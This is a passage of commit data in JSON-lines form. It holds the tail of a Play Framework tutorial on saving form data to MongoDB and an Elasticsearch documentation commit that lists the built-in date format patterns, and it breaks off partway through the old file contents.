https:\/\/www.playframework.com\/documentation\/2.5.x\/ScalaCompileTimeDependencyInjection[compile-time dependency injection]. You can use https:\/\/www.playframework.com\/documentation\/2.5.x\/ScalaDependencyInjection[run-time DI] if you feel confident about it. - download and install https:\/\/www.mongodb.com\/download-center?jmp=homepage#community[mongodb] (brew install mongo for mac or check the video) - download and install http:\/\/3t.io\/mongochef\/[mongochef]\n\n== Tutorial \nvideo::iPKaW1RuTI[youtube]\n\n\n== After the tutorial\n\nYou should be able to : - create a compile-time DI play project - create a form in a play template - understand that a simple post in play requires two endpoints. - one to serve the form - one to handle the post request - create a model class - map a play Form to a case class - mapping - save a case class in Mongo DB\n\nPlay2-reactivemongo documentation\n\nBe careful: we are using *play2-reactivemongo* plugin and not *reactivemongo* driver\n\n== Bonus\n\nDo you know the difference between Action and Action.async ?\nFind out how to return different result statuses pages.\ncheck\n\n* https:\/\/www.playframework.com\/documentation\/2.5.x\/api\/scala\/index.html#play.api.mvc.Results[Play Results documentation]\n* https:\/\/www.playframework.com\/documentation\/2.5.x\/api\/scala\/index.html#play.api.mvc.Results[Play JSON basics]\n* https:\/\/www.playframework.com\/documentation\/2.5.x\/ScalaJsonHttp[Play JSON with HTTP]\n* http:\/\/PlayJSONReads\/Writes\/FormatCombinators[Play JSON Reads\/Writes\/Format Combinators]\n\n\n","old_contents":"= Play Framework - Beginner Tutorial : Make a post request and save the form data in Mongodb\n:published_at: 2016-10-03\n:hp-tags: play\n\n== Before the tutorial\n\nYou should : - read - https:\/\/www.playframework.com\/documentation\/2.5.x\/ScalaActions[Play Documentation : ScalaActions] - https:\/\/www.playframework.com\/documentation\/2.5.x\/ScalaForms[Play Documentation : ScalaForms] - https:\/\/www.playframework.com\/documentation\/2.5.x\/ScalaForms[Play Documentation : ScalaJsonAutomated] - have basic understanding of scala future transformation (map, flatMap) - have basic understanding of scala implicits - https:\/\/github.com\/harrylaou\/play2.5-skeleton-compileDI[clone play2.5-skeleton-compileDI]. \n\nThis example uses https:\/\/www.playframework.com\/documentation\/2.5.x\/ScalaCompileTimeDependencyInjection[compile-time dependency injection]. You can use https:\/\/www.playframework.com\/documentation\/2.5.x\/ScalaDependencyInjection[run-time DI] if you feel confident about it. - download and install https:\/\/www.mongodb.com\/download-center?jmp=homepage#community[mongodb] (brew install mongo for mac or check the video) - download and install http:\/\/3t.io\/mongochef\/[mongochef]\n\n== Tutorial \n\nvideo::iPKaW1RuTI[youtube]\n\n\n== After the tutorial\n\nYou should be able to : - create a compile-time DI play project - create a form in a play template - understand that a simple post in play requires two endpoints. - one to serve the form - one to handle the post request - create a model class - map a play Form to a case class - mapping - save a case class in Mongo DB\n\nPlay2-reactivemongo documentation\n\nBe careful: we are using *play2-reactivemongo* plugin and not *reactivemongo* driver\n\n== Bonus\n\nDo you know the difference between Action and Action.async ?\nFind out how to return different result statuses pages.\ncheck\n\n* https:\/\/www.playframework.com\/documentation\/2.5.x\/api\/scala\/index.html#play.api.mvc.Results[Play Results documentation]\n* https:\/\/www.playframework.com\/documentation\/2.5.x\/api\/scala\/index.html#play.api.mvc.Results[Play JSON basics]\n* https:\/\/www.playframework.com\/documentation\/2.5.x\/ScalaJsonHttp[Play JSON with HTTP]\n* http:\/\/PlayJSONReads\/Writes\/FormatCombinators[Play JSON Reads\/Writes\/Format Combinators]\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"6a8bad8a06aeebf4acaf2db0270e02b2939237d5","subject":"[DOCS] Document all date formats (#21164)","message":"[DOCS] Document all date formats (#21164)\n\nResolves #21046","repos":"uschindler\/elasticsearch,Helen-Zhao\/elasticsearch,nilabhsagar\/elasticsearch,henakamaMSFT\/elasticsearch,nezirus\/elasticsearch,uschindler\/elasticsearch,Stacey-Gammon\/elasticsearch,coding0011\/elasticsearch,shreejay\/elasticsearch,JervyShi\/elasticsearch,JervyShi\/elasticsearch,markwalkom\/elasticsearch,rlugojr\/elasticsearch,obourgain\/elasticsearch,jimczi\/elasticsearch,bawse\/elasticsearch,qwerty4030\/elasticsearch,pozhidaevak\/elasticsearch,nilabhsagar\/elasticsearch,i-am-Nathan\/elasticsearch,jprante\/elasticsearch,shreejay\/elasticsearch,JSCooke\/elasticsearch,vroyer\/elasticassandra,scorpionvicky\/elasticsearch,mjason3\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,gfyoung\/elasticsearch,C-Bish\/elasticsearch,winstonewert\/elasticsearch,fernandozhu\/elasticsearch,wangtuo\/elasticsearch,nazarewk\/elasticsearch,elasticdog\/elasticsearch,Stacey-Gammon\/elasticsearch,a2lin\/elasticsearch,lks21c\/elasticsearch,HonzaKral\/elasticsearch,JervyShi\/elasticsearch,fforbeck\/elasticsearch,StefanGor\/elasticsearch,GlenRSmith\/elasticsearch,sneivandt\/elasticsearch,scottsom\/elasticsearch,rajanm\/elasticsearch,IanvsPoplicola\/elasticsearch,jimczi\/elasticsearch,wenpos\/elasticsearch,MisterAndersen\/elasticsearch,rajanm\/elasticsearch,geidies\/elasticsearch,vroyer\/elassandra,qwerty4030\/elasticsearch,shreejay\/elasticsearch,mikemccand\/elasticsearch,scottsom\/elasticsearch,wuranbo\/elasticsearch,shreejay\/elasticsearch,jprante\/elasticsearch,artnowo\/elasticsearch,fforbeck\/elasticsearch,rlugojr\/elasticsearch,henakamaMSFT\/elasticsearch,nknize\/elasticsearch,i-am-Nathan\/elasticsearch,Shepard1212\/elasticsearch,maddin2016\/elasticsearch,Stacey-Gammon\/elasticsearch,lks21c\/elasticsearch,spiegela\/elasticsearch,wuranbo\/elasticsearch,alexshadow007\/elasticsearch,Stacey-Gammon\/elasticsearch,Helen-Zhao\/elasticsearch,uschindler\/elasticsearch,bawse\/elasticsearch,jimczi\/elasticsearch,strapdata\/elassandra,naveenhooda2000\/elasticsearch,brandonkearby\/elasticsearch,masaruh\/elasticsearch,fred84\/elasticsearch,StefanGor\/elasticsearch,markwalkom\/elasticsearch,njlawton\/elasticsearch,gingerwizard\/elasticsearch,yanjunh\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,kalimatas\/elasticsearch,robin13\/elasticsearch,njlawton\/elasticsearch,sneivandt\/elasticsearch,glefloch\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,robin13\/elasticsearch,henakamaMSFT\/elasticsearch,IanvsPoplicola\/elasticsearch,strapdata\/elassandra,ZTE-PaaS\/elasticsearch,robin13\/elasticsearch,mohit\/elasticsearch,fred84\/elasticsearch,JackyMai\/elasticsearch,fernandozhu\/elasticsearch,IanvsPoplicola\/elasticsearch,markwalkom\/elasticsearch,jprante\/elasticsearch,alexshadow007\/elasticsearch,fernandozhu\/elasticsearch,JackyMai\/elasticsearch,gfyoung\/elasticsearch,fernandozhu\/elasticsearch,Helen-Zhao\/elasticsearch,mortonsykes\/elasticsearch,pozhidaevak\/elasticsearch,coding0011\/elasticsearch,maddin2016\/elasticsearch,Stacey-Gammon\/elasticsearch,C-Bish\/elasticsearch,nazarewk\/elasticsearch,LeoYao\/elasticsearch,obourgain\/elasticsearch,fred84\/elasticsearch,maddin2016\/elasticsearch,Shepard1212\/elasticsearch,wenpos\/elasticsearch,mohit\/elasticsearch,mikemccand\/elasticsearch,MisterAndersen\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,glefloch\/elasticsearch,elasticdog\/elasticsearch,Shepard1212\/elasticsearch,jimczi\/elasticsearch,wuranbo\/elasticsearch,LeoYao\/elasticsearch,umeshdangat\/elasticsearch,vroyer\/elassandra,masaruh\/elasticsearch,nazarewk\/elasticsearch,MisterAndersen\/elasticsearch,scottsom\/elasticsearch,alexshadow007\/elasticsearch,ZTE-PaaS\/elasticsearch,obourgain\/elasticsearch,C-Bish\/elasticsearch,mikemccand\/elasticsearch,lks21c\/elasticsearch,nknize\/elasticsearch,henakamaMSFT\/elasticsearch,elasticdog\/elasticsearch,naveenhooda2000\/elasticsearch,artnowo\/elasticsearch,umeshdangat\/elasticsearch,fforbeck\/elasticsearch,wenpos\/elasticsearch,i-am-Nathan\/elasticsearch,coding0011\/elasticsearch,njlawton\/elasticsearch,s1monw\/elasticsearch,mohit\/elasticsearch,mortonsykes\/elasticsearch,mikemccand\/elasticsearch,markwalkom\/elasticsearch,JervyShi\/elasticsearch,gfyoung\/elasticsearch,IanvsPoplicola\/elasticsearch,jimczi\/elasticsearch,strapdata\/elassandra,lks21c\/elasticsearch,winstonewert\/elasticsearch,mortonsykes\/elasticsearch,scorpionvicky\/elasticsearch,strapdata\/elassandra,JSCooke\/elasticsearch,glefloch\/elasticsearch,MaineC\/elasticsearch,spiegela\/elasticsearch,henakamaMSFT\/elasticsearch,i-am-Nathan\/elasticsearch,mortonsykes\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,wangtuo\/elasticsearch,shreejay\/elasticsearch,artnowo\/elasticsearch,Shepard1212\/elasticsearch,rlugojr\/elasticsearch,glefloch\/elasticsearch,masaruh\/elasticsearch,fernandozhu\/elasticsearch,rajanm\/elasticsearch,njlawton\/elasticsearch,rajanm\/elasticsearch,JSCooke\/elasticsearch,gfyoung\/elasticsearch,LeoYao\/elasticsearch,gingerwizard\/elasticsearch,bawse\/elasticsearch,winstonewert\/elasticsearch,Helen-Zhao\/elasticsearch,MaineC\/elasticsearch,qwerty4030\/elasticsearch,strapdata\/elassandra,elasticdog\/elasticsearch,MaineC\/elasticsearch,nazarewk\/elasticsearch,pozhidaevak\/elasticsearch,maddin2016\/elasticsearch,LewayneNaidoo\/elasticsearch,a2lin\/elasticsearch,ZTE-PaaS\/elasticsearch,Helen-Zhao\/elasticsearch,StefanGor\/elasticsearch,bawse\/elasticsearch,qwerty4030\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,nezirus\/elasticsearch,scorpionvicky\/elasticsearch,LeoYao\/elasticsearch,C-Bish\/elasticsearch,fred84\/elasticsearch,elasticdog\/elasticsearch,brandonkearby\/elasticsearch,sneivandt\/elasticsearch,masaruh\/elasticsearch,GlenRSmith\/elasticsearch,yanjunh\/elasticsearch,IanvsPoplicola\/elasticsearch,spiegela\/elasticsearch,HonzaKral\/elasticsearch,masaruh\/elasticsearch,umeshdangat\/elasticsearch,pozhidaevak\/elasticsearch,alexshadow007\/elasticsearch,robin13\/elasticsearch,brandonkearby\/elasticsearch,LeoYao\/elasticsearch,geidies\/elasticsearch,jprante\/elasticsearch,ZTE-PaaS\/elasticsearch,s1monw\/elasticsearch,geidies\/elasticsearch,scorpionvicky\/elasticsearch,JackyMai\/elasticsearch,nilabhsagar\/elasticsearch,obourgain\/elasticsearch,a2lin\/elasticsearch,MisterAndersen\/elasticsearch,robin13\/elasticsearch,vroyer\/elasticassandra,scottsom\/elasticsearch,Shepard1212\/elasticsearch,LewayneNaidoo\/elasticsearch,vroyer\/elassandra,wangtuo\/elasticsearch,naveenhooda2000\/elasticsearch,yanjunh\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,geidies\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,spiegela\/elasticsearch,mohit\/elasticsearch,yanjunh\/elasticsearch,HonzaKral\/elasticsearch,kalimatas\/elasticsearch,wangtuo\/elasticsearch,markwalkom\/elasticsearch,gingerwizard\/elasticsearch,nezirus\/elasticsearch,gingerwizard\/elasticsearch,yanjunh\/elasticsearch,winstonewert\/elasticsearch,uschindler\/elasticsearch,JSCooke\/elasticsearch,nazarewk\/elasticsearch,kalimatas\/elasticsearch,scorpionvicky\/elasticsearch,a2lin\/elasticsearch,mohit\/elasticsearch,naveenhooda2000\/elasticsearch,LewayneNaidoo\/elasticsearch,C-Bish\/elasticsearch,jprante\/elasticsearch,mjason3\/elasticsearch,artnowo\/elasticsearch,obourgain\/elasticsearch,JackyMai\/elasticsearch,vroyer\/elasticassandra,brandonkearby\/elasticsearch,pozhidaevak\/elasticsearch,mjason3\/elasticsearch,artnowo\/elasticsearch,JervyShi\/elasticsearch,LeoYao\/elasticsearch,i-am-Nathan\/elasticsearch,nezirus\/elasticsearch,gingerwizard\/elasticsearch,JSCooke\/elasticsearch,glefloch\/elasticsearch,LeoYao\/elasticsearch,HonzaKral\/elasticsearch,lks21c\/elasticsearch,sneivandt\/elasticsearch,nknize\/elasticsearch,fforbeck\/elasticsearch,mjason3\/elasticsearch,markwalkom\/elasticsearch,fforbeck\/elasticsearch,umeshdangat\/elasticsearch,s1monw\/elasticsearch,kalimatas\/elasticsearch,mjason3\/elasticsearch,naveenhooda2000\/elasticsearch,umeshdangat\/elasticsearch,MaineC\/elasticsearch,wangtuo\/elasticsearch,coding0011\/elasticsearch,geidies\/elasticsearch,wenpos\/elasticsearch,winstonewert\/elasticsearch,geidies\/elasticsearch,JervyShi\/elasticsearch,wenpos\/elasticsearch,mortonsykes\/elasticsearch,rajanm\/elasticsearch,a2lin\/elasticsearch,GlenRSmith\/elasticsearch,nilabhsagar\/elasticsearch,wuranbo\/elasticsearch,coding0011\/elasticsearch,kalimatas\/elasticsearch,fred84\/elasticsearch,njlawton\/elasticsearch,StefanGor\/elasticsearch,rajanm\/elasticsearch,sneivandt\/elasticsearch,rlugojr\/elasticsearch,MaineC\/elasticsearch,mikemccand\/elasticsearch,s1monw\/elasticsearch,brandonkearby\/elasticsearch,MisterAndersen\/elasticsearch,nilabhsagar\/elasticsearch,bawse\/elasticsearch,JackyMai\/elasticsearch,qwerty4030\/elasticsearch,uschindler\/elasticsearch,LewayneNaidoo\/elasticsearch,maddin2016\/elasticsearch,LewayneNaidoo\/elasticsearch,wuranbo\/elasticsearch,rlugojr\/elasticsearch,nknize\/elasticsearch,spiegela\/elasticsearch,StefanGor\/elasticsearch,nezirus\/elasticsearch,GlenRSmith\/elasticsearch,alexshadow007\/elasticsearch,ZTE-PaaS\/elasticsearch,scottsom\/elasticsearch,s1monw\/elasticsearch","old_file":"docs\/reference\/mapping\/params\/format.asciidoc","new_file":"docs\/reference\/mapping\/params\/format.asciidoc","new_contents":"[[mapping-date-format]]\n=== `format`\n\nIn JSON documents, dates are represented as strings. Elasticsearch uses a set\nof preconfigured formats to recognize and parse these strings into a long\nvalue representing _milliseconds-since-the-epoch_ in UTC.\n\nBesides the <<built-in-date-formats,built-in formats>>, your own\n<<custom-date-formats,custom formats>> can be specified using the familiar\n`yyyy\/MM\/dd` syntax:\n\n[source,js]\n--------------------------------------------------\nPUT my_index\n{\n \"mappings\": {\n \"my_type\": {\n \"properties\": {\n \"date\": {\n \"type\": \"date\",\n \"format\": \"yyyy-MM-dd\"\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nMany APIs which support date values also support <<date-math,date math>>\nexpressions, such as `now-1m\/d` -- the current time, minus one month, rounded\ndown to the nearest day.\n\nTIP: The `format` setting must have the same setting for fields of the same\nname in the same index. Its value can be updated on existing fields using the\n<<indices-put-mapping,PUT mapping API>>.\n\n\n[[custom-date-formats]]\n==== Custom date formats\n\nCompletely customizable date formats are supported. The syntax for these is explained\nhttp:\/\/www.joda.org\/joda-time\/apidocs\/org\/joda\/time\/format\/DateTimeFormat.html[in the Joda docs].\n\n[[built-in-date-formats]]\n==== Built In Formats\n\nMost of the below dates have a `strict` companion dates, which means, that\nyear, month and day parts of the week must have prepending zeros in order\nto be valid. This means, that a date like `5\/11\/1` would not be valid, but\nyou would need to specify the full date, which would be `2005\/11\/01` in this\nexample. So instead of `date_optional_time` you would need to specify\n`strict_date_optional_time`.\n\nThe following tables lists all the defaults ISO formats supported:\n\n`epoch_millis`::\n\n A formatter for the number of milliseconds since the epoch. Note, that\n this timestamp is subject to the limits of a Java `Long.MIN_VALUE` and\n `Long.MAX_VALUE`.\n\n`epoch_second`::\n\n A formatter for the number of seconds since the epoch. Note, that this\n timestamp is subject to the limits of a Java `Long.MIN_VALUE` and `Long.\n MAX_VALUE` divided by 1000 (the number of milliseconds in a second).\n\n[[strict-date-time]]`date_optional_time` or `strict_date_optional_time`::\n\n A generic ISO datetime parser where the date is mandatory and the time is\n optional.\n http:\/\/www.joda.org\/joda-time\/apidocs\/org\/joda\/time\/format\/ISODateTimeFormat.html#dateOptionalTimeParser--[Full details here].\n\n`basic_date`::\n\n A basic formatter for a full date as four digit year, two digit month of\n year, and two digit day of month: `yyyyMMdd`.\n\n`basic_date_time`::\n\n A basic formatter that combines a basic date and time, separated by a 'T':\n `yyyyMMdd'T'HHmmss.SSSZ`.\n\n`basic_date_time_no_millis`::\n\n A basic formatter that combines a basic date and time without millis,\n separated by a 'T': `yyyyMMdd'T'HHmmssZ`.\n\n`basic_ordinal_date`::\n\n A formatter for a full ordinal date, using a four digit year and three\n digit dayOfYear: `yyyyDDD`.\n\n`basic_ordinal_date_time`::\n\n A formatter for a full ordinal date and time, using a four digit year and\n three digit dayOfYear: `yyyyDDD'T'HHmmss.SSSZ`.\n\n`basic_ordinal_date_time_no_millis`::\n\n A formatter for a full ordinal date and time without millis, using a four\n digit year and three digit dayOfYear: `yyyyDDD'T'HHmmssZ`.\n\n`basic_time`::\n\n A basic formatter for a two digit hour of day, two digit minute of hour,\n two digit second of minute, three digit millis, and time zone offset:\n `HHmmss.SSSZ`.\n\n`basic_time_no_millis`::\n\n A basic formatter for a two digit hour of day, two digit minute of hour,\n two digit second of minute, and time zone offset: `HHmmssZ`.\n\n`basic_t_time`::\n\n A basic formatter for a two digit hour of day, two digit minute of hour,\n two digit second of minute, three digit millis, and time zone off set\n prefixed by 'T': `'T'HHmmss.SSSZ`.\n\n`basic_t_time_no_millis`::\n\n A basic formatter for a two digit hour of day, two digit minute of hour,\n two digit second of minute, and time zone offset prefixed by 'T':\n `'T'HHmmssZ`.\n\n`basic_week_date` or `strict_basic_week_date`::\n\n A basic formatter for a full date as four digit weekyear, two digit week\n of weekyear, and one digit day of week: `xxxx'W'wwe`.\n\n`basic_week_date_time` or `strict_basic_week_date_time`::\n\n A basic formatter that combines a basic weekyear date and time, separated\n by a 'T': `xxxx'W'wwe'T'HHmmss.SSSZ`.\n\n`basic_week_date_time_no_millis` or `strict_basic_week_date_time_no_millis`::\n\n A basic formatter that combines a basic weekyear date and time without\n millis, separated by a 'T': `xxxx'W'wwe'T'HHmmssZ`.\n\n`date` or `strict_date`::\n\n A formatter for a full date as four digit year, two digit month of year,\n and two digit day of month: `yyyy-MM-dd`.\n\n`date_hour` or `strict_date_hour`::\n\n A formatter that combines a full date and two digit hour of day:\n `yyyy-MM-dd'T'HH`.\n\n`date_hour_minute` or `strict_date_hour_minute`::\n\n A formatter that combines a full date, two digit hour of day, and two\n digit minute of hour: `yyyy-MM-dd'T'HH:mm`.\n\n`date_hour_minute_second` or `strict_date_hour_minute_second`::\n\n A formatter that combines a full date, two digit hour of day, two digit\n minute of hour, and two digit second of minute: `yyyy-MM-dd'T'HH:mm:ss`.\n\n`date_hour_minute_second_fraction` or `strict_date_hour_minute_second_fraction`::\n\n A formatter that combines a full date, two digit hour of day, two digit\n minute of hour, two digit second of minute, and three digit fraction of\n second: `yyyy-MM-dd'T'HH:mm:ss.SSS`.\n\n`date_hour_minute_second_millis` or `strict_date_hour_minute_second_millis`::\n\n A formatter that combines a full date, two digit hour of day, two digit\n minute of hour, two digit second of minute, and three digit fraction of\n second: `yyyy-MM-dd'T'HH:mm:ss.SSS`.\n\n`date_time` or `strict_date_time`::\n\n A formatter that combines a full date and time, separated by a 'T': \n `yyyy-MM-dd'T'HH:mm:ss.SSSZZ`.\n\n`date_time_no_millis` or `strict_date_time_no_millis`::\n\n A formatter that combines a full date and time without millis, separated\n by a 'T': `yyyy-MM-dd'T'HH:mm:ssZZ`.\n\n`hour` or `strict_hour`::\n\n A formatter for a two digit hour of day: `HH`\n\n`hour_minute` or `strict_hour_minute`::\n\n A formatter for a two digit hour of day and two digit minute of hour:\n `HH:mm`.\n\n`hour_minute_second` or `strict_hour_minute_second`::\n\n A formatter for a two digit hour of day, two digit minute of hour, and two\n digit second of minute: `HH:mm:ss`.\n\n`hour_minute_second_fraction` or `strict_hour_minute_second_fraction`::\n\n A formatter for a two digit hour of day, two digit minute of hour, two\n digit second of minute, and three digit fraction of second: `HH:mm:ss.SSS`.\n\n`hour_minute_second_millis` or `strict_hour_minute_second_millis`::\n\n A formatter for a two digit hour of day, two digit minute of hour, two\n digit second of minute, and three digit fraction of second: `HH:mm:ss.SSS`.\n\n`ordinal_date` or `strict_ordinal_date`::\n\n A formatter for a full ordinal date, using a four digit year and three\n digit dayOfYear: `yyyy-DDD`.\n\n`ordinal_date_time` or `strict_ordinal_date_time`::\n\n A formatter for a full ordinal date and time, using a four digit year and\n three digit dayOfYear: `yyyy-DDD'T'HH:mm:ss.SSSZZ`.\n\n`ordinal_date_time_no_millis` or `strict_ordinal_date_time_no_millis`::\n\n A formatter for a full ordinal date and time without millis, using a four\n digit year and three digit dayOfYear: `yyyy-DDD'T'HH:mm:ssZZ`.\n\n`time` or `strict_time`::\n\n A formatter for a two digit hour of day, two digit minute of hour, two\n digit second of minute, three digit fraction of second, and time zone\n offset: `HH:mm:ss.SSSZZ`.\n\n`time_no_millis` or `strict_time_no_millis`::\n\n A formatter for a two digit hour of day, two digit minute of hour, two\n digit second of minute, and time zone offset: `HH:mm:ssZZ`.\n\n`t_time` or `strict_t_time`::\n\n A formatter for a two digit hour of day, two digit minute of hour, two\n digit second of minute, three digit fraction of second, and time zone\n offset prefixed by 'T': `'T'HH:mm:ss.SSSZZ`.\n\n`t_time_no_millis` or `strict_t_time_no_millis`::\n\n A formatter for a two digit hour of day, two digit minute of hour, two\n digit second of minute, and time zone offset prefixed by 'T': `'T'HH:mm:ssZZ`.\n\n`week_date` or `strict_week_date`::\n\n A formatter for a full date as four digit weekyear, two digit week of\n weekyear, and one digit day of week: `xxxx-'W'ww-e`.\n\n`week_date_time` or `strict_week_date_time`::\n\n A formatter that combines a full weekyear date and time, separated by a\n 'T': `xxxx-'W'ww-e'T'HH:mm:ss.SSSZZ`.\n\n`week_date_time_no_millis` or `strict_week_date_time_no_millis`::\n\n A formatter that combines a full weekyear date and time without millis,\n separated by a 'T': `xxxx-'W'ww-e'T'HH:mm:ssZZ`.\n\n`weekyear` or `strict_weekyear`::\n\n A formatter for a four digit weekyear: `xxxx`.\n\n`weekyear_week` or `strict_weekyear_week`::\n\n A formatter for a four digit weekyear and two digit week of weekyear:\n `xxxx-'W'ww`.\n\n`weekyear_week_day` or `strict_weekyear_week_day`::\n\n A formatter for a four digit weekyear, two digit week of weekyear, and one\n digit day of week: `xxxx-'W'ww-e`.\n\n`year` or `strict_year`::\n\n A formatter for a four digit year: `yyyy`.\n\n`year_month` or `strict_year_month`::\n\n A formatter for a four digit year and two digit month of year: `yyyy-MM`.\n\n`year_month_day` or `strict_year_month_day`::\n\n A formatter for a four digit year, two digit month of year, and two digit\n day of month: `yyyy-MM-dd`.\n\n","old_contents":"[[mapping-date-format]]\n=== `format`\n\nIn JSON documents, dates are represented as strings. Elasticsearch uses a set\nof preconfigured formats to recognize and parse these strings into a long\nvalue representing _milliseconds-since-the-epoch_ in UTC.\n\nBesides the <<built-in-date-formats,built-in formats>>, your own\n<<custom-date-formats,custom formats>> can be specified using the familiar\n`yyyy\/MM\/dd` syntax:\n\n[source,js]\n--------------------------------------------------\nPUT my_index\n{\n \"mappings\": {\n \"my_type\": {\n \"properties\": {\n \"date\": {\n \"type\": \"date\",\n \"format\": \"yyyy-MM-dd\"\n }\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\nMany APIs which support date values also support <<date-math,date math>>\nexpressions, such as `now-1m\/d` -- the current time, minus one month, rounded\ndown to the nearest day.\n\nTIP: The `format` setting must have the same setting for fields of the same\nname in the same index. Its value can be updated on existing fields using the\n<<indices-put-mapping,PUT mapping API>>.\n\n\n[[custom-date-formats]]\n==== Custom date formats\n\nCompletely customizable date formats are supported. The syntax for these is explained\nhttp:\/\/www.joda.org\/joda-time\/apidocs\/org\/joda\/time\/format\/DateTimeFormat.html[in the Joda docs].\n\n[[built-in-date-formats]]\n==== Built In Formats\n\nMost of the below dates have a `strict` companion dates, which means, that\nyear, month and day parts of the week must have prepending zeros in order\nto be valid. This means, that a date like `5\/11\/1` would not be valid, but\nyou would need to specify the full date, which would be `2005\/11\/01` in this\nexample. So instead of `date_optional_time` you would need to specify\n`strict_date_optional_time`.\n\nThe following tables lists all the defaults ISO formats supported:\n\n`epoch_millis`::\n\n A formatter for the number of milliseconds since the epoch. Note, that\n this timestamp is subject to the limits of a Java `Long.MIN_VALUE` and\n `Long.MAX_VALUE`.\n\n`epoch_second`::\n\n A formatter for the number of seconds since the epoch. Note, that this\n timestamp is subject to the limits of a Java `Long.MIN_VALUE` and `Long.\n MAX_VALUE` divided by 1000 (the number of milliseconds in a second).\n\n[[strict-date-time]]`date_optional_time` or `strict_date_optional_time`::\n\n A generic ISO datetime parser where the date is mandatory and the time is\n optional.\n http:\/\/www.joda.org\/joda-time\/apidocs\/org\/joda\/time\/format\/ISODateTimeFormat.html#dateOptionalTimeParser--[Full details here].\n\n`basic_date`::\n\n A basic formatter for a full date as four digit year, two digit month of\n year, and two digit day of month: `yyyyMMdd`.\n\n`basic_date_time`::\n\n A basic formatter that combines a basic date and time, separated by a 'T':\n `yyyyMMdd'T'HHmmss.SSSZ`.\n\n`basic_date_time_no_millis`::\n\n A basic formatter that combines a basic date and time without millis,\n separated by a 'T': `yyyyMMdd'T'HHmmssZ`.\n\n`basic_ordinal_date`::\n\n A formatter for a full ordinal date, using a four digit year and three\n digit dayOfYear: `yyyyDDD`.\n\n`basic_ordinal_date_time`::\n\n A formatter for a full ordinal date and time, using a four digit year and\n three digit dayOfYear: `yyyyDDD'T'HHmmss.SSSZ`.\n\n`basic_ordinal_date_time_no_millis`::\n\n A formatter for a full ordinal date and time without millis, using a four\n digit year and three digit dayOfYear: `yyyyDDD'T'HHmmssZ`.\n\n`basic_time`::\n\n A basic formatter for a two digit hour of day, two digit minute of hour,\n two digit second of minute, three digit millis, and time zone offset:\n `HHmmss.SSSZ`.\n\n`basic_time_no_millis`::\n\n A basic formatter for a two digit hour of day, two digit minute of hour,\n two digit second of minute, and time zone offset: `HHmmssZ`.\n\n`basic_t_time`::\n\n A basic formatter for a two digit hour of day, two digit minute of hour,\n two digit second of minute, three digit millis, and time zone off set\n prefixed by 'T': `'T'HHmmss.SSSZ`.\n\n`basic_t_time_no_millis`::\n\n A basic formatter for a two digit hour of day, two digit minute of hour,\n two digit second of minute, and time zone offset prefixed by 'T':\n `'T'HHmmssZ`.\n\n`basic_week_date` or `strict_basic_week_date`::\n\n A basic formatter for a full date as four digit weekyear, two digit week\n of weekyear, and one digit day of week: `xxxx'W'wwe`.\n\n`basic_week_date_time` or `strict_basic_week_date_time`::\n\n A basic formatter that combines a basic weekyear date and time, separated\n by a 'T': `xxxx'W'wwe'T'HHmmss.SSSZ`.\n\n`basic_week_date_time_no_millis` or `strict_basic_week_date_time_no_millis`::\n\n A basic formatter that combines a basic weekyear date and time without\n millis, separated by a 'T': `xxxx'W'wwe'T'HHmmssZ`.\n\n`date` or `strict_date`::\n\n A formatter for a full date as four digit year, two digit month of year,\n and two digit day of month: `yyyy-MM-dd`.\n\n`date_hour` or `strict_date_hour`::\n\n A formatter that combines a full date and two digit hour of day.\n\n`date_hour_minute` or `strict_date_hour_minute`::\n\n A formatter that combines a full date, two digit hour of day, and two\n digit minute of hour.\n\n`date_hour_minute_second` or `strict_date_hour_minute_second`::\n\n A formatter that combines a full date, two digit hour of day, two digit\n minute of hour, and two digit second of minute.\n\n`date_hour_minute_second_fraction` or `strict_date_hour_minute_second_fraction`::\n\n A formatter that combines a full date, two digit hour of day, two digit\n minute of hour, two digit second of minute, and three digit fraction of\n second: `yyyy-MM-dd'T'HH:mm:ss.SSS`.\n\n`date_hour_minute_second_millis` or `strict_date_hour_minute_second_millis`::\n\n A formatter that combines a full date, two digit hour of day, two digit\n minute of hour, two digit second of minute, and three digit fraction of\n second: `yyyy-MM-dd'T'HH:mm:ss.SSS`.\n\n`date_time` or `strict_date_time`::\n\n A formatter that combines a full date and time, separated by a 'T': \n `yyyy-MM-dd'T'HH:mm:ss.SSSZZ`.\n\n`date_time_no_millis` or `strict_date_time_no_millis`::\n\n A formatter that combines a full date and time without millis, separated\n by a 'T': `yyyy-MM-dd'T'HH:mm:ssZZ`.\n\n`hour` or `strict_hour`::\n\n A formatter for a two digit hour of day.\n\n`hour_minute` or `strict_hour_minute`::\n\n A formatter for a two digit hour of day and two digit minute of hour.\n\n`hour_minute_second` or `strict_hour_minute_second`::\n\n A formatter for a two digit hour of day, two digit minute of hour, and two\n digit second of minute.\n\n`hour_minute_second_fraction` or `strict_hour_minute_second_fraction`::\n\n A formatter for a two digit hour of day, two digit minute of hour, two\n digit second of minute, and three digit fraction of second: `HH:mm:ss.SSS`.\n\n`hour_minute_second_millis` or `strict_hour_minute_second_millis`::\n\n A formatter for a two digit hour of day, two digit minute of hour, two\n digit second of minute, and three digit fraction of second: `HH:mm:ss.SSS`.\n\n`ordinal_date` or `strict_ordinal_date`::\n\n A formatter for a full ordinal date, using a four digit year and three\n digit dayOfYear: `yyyy-DDD`.\n\n`ordinal_date_time` or `strict_ordinal_date_time`::\n\n A formatter for a full ordinal date and time, using a four digit year and\n three digit dayOfYear: `yyyy-DDD'T'HH:mm:ss.SSSZZ`.\n\n`ordinal_date_time_no_millis` or `strict_ordinal_date_time_no_millis`::\n\n A formatter for a full ordinal date and time without millis, using a four\n digit year and three digit dayOfYear: `yyyy-DDD'T'HH:mm:ssZZ`.\n\n`time` or `strict_time`::\n\n A formatter for a two digit hour of day, two digit minute of hour, two\n digit second of minute, three digit fraction of second, and time zone\n offset: 